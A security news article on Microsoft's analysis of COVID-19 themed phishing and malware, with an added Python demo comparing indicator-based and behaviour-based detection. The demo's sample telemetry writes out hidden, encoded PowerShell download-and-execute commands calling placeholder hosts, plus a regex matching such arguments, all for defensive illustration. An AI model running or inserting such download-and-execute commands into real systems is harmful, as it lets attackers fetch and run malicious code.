Microsoft’s COVID-19 Threat Analysis Reveals Attackers Adapt Campaigns to Local Events

Many threat actors have adopted COVID-19 themed lures in phishing campaigns and for distributing malware, but the proportion of COVID-19 related threats is much lower than the headlines suggest, according to a recent report from Microsoft. Microsoft’s figures put COVID-19 and coronavirus themed attacks at only about 2% of all threats observed over the past four months.

Microsoft has previously reported that although COVID-19 themed threats did increase, as widely reported, the total volume of threats barely changed. Threat actors repurposed their existing infrastructure and swapped their lures for COVID-19 themes. The overall rise in attacks was a small blip, and malware campaigns have remained fairly constant throughout the COVID-19 crisis.

Microsoft confirmed that COVID-19 themed threats have increased since February and does not expect them to fall back to the levels seen in February or earlier until the threat from the virus itself significantly recedes, but the peak has long since passed. COVID-19 themed threats peaked in the first two weeks of March and have declined steadily since, as threat actors have returned to their previous campaigns using standard phishing and identity compromise attacks.

Microsoft explains that the lures used in malware and phishing campaigns are localized and follow developments in the countries being targeted. Microsoft analyzed trends in three countries and notes that in the United Kingdom, COVID-19 themed campaigns peaked early in the outbreak, around the time the first COVID-19 death was reported. Attacks then declined until the Prime Minister was admitted to hospital, when they rose again, and fell once he was discharged.

The United States saw three peaks, but the pattern is similar to that of the UK. The first peak coincided with the announcement of the first death; attacks then declined until the WHO declared COVID-19 a pandemic, rose until the travel ban was announced, and then fell sharply and plateaued until around March 17, when a sharp spike began that lasted until 100,000 deaths had been reported, followed by a similarly sharp decline.

Cybercriminals have taken advantage of the opportunities created by COVID-19, but what is actually happening is that they are responding to local news, adapting their campaigns to maximize the chance of success. Lures will change rapidly depending on local events.

“Defender investment is best placed in cross-domain signal analysis, update deployment, and user education,” explained Microsoft. “These COVID-19 themed attacks show us that the threats our users face are constant on a global scale. Investments that raise the cost of attack or lower the likelihood of success are the optimal path forward.”

Microsoft recommends that network defenders focus on the behaviors of attackers, as this will be more effective than relying solely on indicators of compromise. Indicators tend to be a snapshot of a point in time and are far less durable: the lure theme, document hashes and domains change each time a campaign is re-themed, while the attacker's underlying behavior persists.
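To make that recommendation concrete, the following is an added example (not code from Microsoft's report or from NetSec.news) that runs an indicator rule and a behavior rule side by side over constructed endpoint process-creation events. The telemetry, the document names, the hashes (derived from the file names with SHA-256) and the domains are all made up for illustration; the two malicious events use the same macro-to-PowerShell tradecraft, first with a COVID-19 themed lure and then re-themed as an invoice. The IOC feed was "captured" during the first wave only, so it misses the re-themed wave, while the behavior rule (an Office application spawning a script host with download or obfuscation arguments) catches both and ignores the benign events.

```python
"""Added example: indicator-based vs. behavior-based detection over constructed
endpoint process-creation events. Not from Microsoft's report; all data is made up."""
import base64
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    label: str              # campaign wave the event belongs to (annotation only)
    parent_image: str       # process that spawned the new process
    image: str              # the newly created process
    command_line: str
    file_sha256: str        # hash of the document that started the chain
    contacted_domain: str   # first domain the child process resolved ("" if none)


def fake_sha256(name: str) -> str:
    """Constructed document hash for the sample data (not a real malware sample)."""
    return hashlib.sha256(name.encode()).hexdigest()


def encoded_command(script: str) -> str:
    """Mimic PowerShell -EncodedCommand: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Indicator snapshot taken during the first, COVID-19 themed wave. This is what an
# IOC feed hands you: one document hash and one domain, valid until the next re-theme.
IOC_FEED = {
    "sha256": {fake_sha256("COVID-19_Relief_Form.doc")},
    "domains": {"covid19-relief-update.example"},
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Arguments typical of a macro-launched downloader: encoded payloads, hidden windows,
# in-memory download-and-execute. Matched case-insensitively.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|downloadstring|invoke-expression|\biex\b|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)


def ioc_match(ev: ProcessEvent) -> bool:
    """Indicator rule: fires only on artefacts that have already been seen."""
    return ev.file_sha256 in IOC_FEED["sha256"] or ev.contacted_domain in IOC_FEED["domains"]


def behaviour_match(ev: ProcessEvent) -> bool:
    """Behavior rule: an Office application spawning a script host with suspicious
    arguments. Independent of the lure theme, the document hash and the domain."""
    return (
        ev.parent_image.lower() in OFFICE_APPS
        and ev.image.lower() in SCRIPT_HOSTS
        and SUSPICIOUS_ARGS.search(ev.command_line) is not None
    )


def evaluate(events):
    """Return, per rule, the labels of the events it flags, in event order."""
    return {
        "ioc": [ev.label for ev in events if ioc_match(ev)],
        "behaviour": [ev.label for ev in events if behaviour_match(ev)],
    }


# Constructed sample telemetry: the same tradecraft re-themed from a COVID-19 lure to
# an invoice lure, plus two benign events (Word printing, an admin running PowerShell).
SAMPLE_EVENTS = [
    ProcessEvent("covid-wave-1", "WINWORD.EXE", "powershell.exe",
                 "powershell.exe -w hidden -enc " + encoded_command(
                     "IEX (New-Object Net.WebClient).DownloadString('https://covid19-relief-update.example/f')"),
                 fake_sha256("COVID-19_Relief_Form.doc"), "covid19-relief-update.example"),
    ProcessEvent("invoice-wave-2", "WINWORD.EXE", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -EncodedCommand " + encoded_command(
                     "IEX (New-Object Net.WebClient).DownloadString('https://invoice-portal-sync.example/f')"),
                 fake_sha256("Invoice_4471.doc"), "invoice-portal-sync.example"),
    ProcessEvent("benign-print", "WINWORD.EXE", "splwow64.exe",
                 "splwow64.exe 12288", fake_sha256("Quarterly_Report.docx"), ""),
    ProcessEvent("benign-admin", "cmd.exe", "powershell.exe",
                 'powershell.exe -Command "Get-Service -Name Spooler"',
                 fake_sha256("Admin_Session"), ""),
]


if __name__ == "__main__":
    for rule, hits in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule:10s} -> {hits}")
```

Running the block prints `ioc -> ['covid-wave-1']` and `behaviour -> ['covid-wave-1', 'invoice-wave-2']`: the indicator rule stops working the moment the lure, document and domain change, while the parent/child/argument pattern keeps matching because it describes what the attacker does rather than what the attacker used last week. In a real deployment the behavior rule would be tuned against the organisation's own baseline (some line-of-business macros legitimately launch scripts) and the IOC feed would still be worth keeping for fast, low-cost retrospective matching; the point is only which of the two survives a re-theme.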

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of NetSec.news